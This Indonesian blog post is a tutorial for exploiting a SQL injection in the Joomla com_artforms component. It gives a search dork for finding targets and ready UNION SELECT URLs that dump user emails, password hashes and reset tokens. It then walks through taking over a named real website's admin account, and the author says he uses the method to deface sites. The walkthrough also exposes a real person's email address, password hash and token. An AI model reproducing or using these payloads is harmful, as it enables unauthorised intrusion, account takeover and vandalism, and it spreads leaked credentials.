Exploit Joomla Com_artforms

 dork : inurl:"option com_artforms" 

Exploit : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users-- 

] Reset Password : /index.php?option=com_user&view=reset 

Exploit Token : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users-- 

 login admin : /administrator 

Oke  kali ini saya mau share tentang exploit joomla com_artforms karna saya suka dengan exploit ini 
jangan takut karna exploit ini masih bisa di gunakan sampai sekarang :) toturial ini sangat simple dan totur ini sering 
saya pakai untuk deface website dengan exploit yang 1 ini 
ok tanpa basa basi aja ya :) sekarang buka google dan ketik dork di atas 
Dork : inurl:"option com_artforms" 
bisa juga menggunakan dengan mirc :D bagi yang tau ya saya di sini suka manual karna saya jarang main mirc :D 
ok sekarang kita dapat target contoh target di sini saya mendapat kan ini http://www.avaclean.com/ 
target : http://www.avaclean.com/ 
dan sekarang kita buka web target tadi 
contoh : http://www.avaclean.com/ dan sekarang coba pasang exploit no 2 tadi 

dengan contoh seperti ini : 

http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users-- 

dan hasil nya akan seperti ini 

josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P 

dan sekarang kita coba open tab untuk mereset password nya 
contoh : 
http://www.avaclean.com//index.php?option=com_user&view=reset 

dan sekarang masukan email tersebut 
josh@bkmediagroup.com 

ok nanti dia akan meminta token uppzzz jangan senang dulu sekarang kita coba cari token dengan memakai exploit no 4 
contoh : 
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users-- 

dan hasil nya akan menjadi seperti ini 
admineda7d6142fac40a533b56407a4617371 

ok sekarang kita kembali ke reset password tadi kan tadi minta token sekarang kita liat code yang barusan tadi 
ok kita dapat seperti ini : admineda7d6142fac40a533b56407a4617371 <== yang mana code token nya ?? ok sekarang saya jelas kan 

code : [admin]eda7d6142fac40a533b56407a4617371 
yang saya kasih dalam tanda kurung itu adalah user nya 
nah sekarang coba kita ambil code ini : eda7d6142fac40a533b56407a4617371 
dan itu adalah token nya :) ok binggo sekarang user sudah ke reset tinggal masukan password baru aja :D 
selamat sekarang anda menjadi admin 
untuk joomla login ada biasa nya 
contoh login admin : http://localhost/administrator 
dan sekarang coba kita masukan dengan user yang tadi kalian dapat dan password baru yang kalian buat tadi :) 

Klao kalian menemukan yang tokennya seperti ini :admin39e2d1bd5f899df5c15ac35abb9bc977:$1$c8b6c03c$  udah tinggalin aja ntu web :v

Judul: Exploit Joomla Com_artforms
Rating: 100% based on 99998 ratings. 5 user reviews.
Ditulis Oleh Unknown

Terimakasih atas kunjungan Sobat beserta kesediaan Anda membaca artikel ini. Kritik dan Saran sobat dapat sampaikan melalui Kotak komentar dibawah ini.

Widget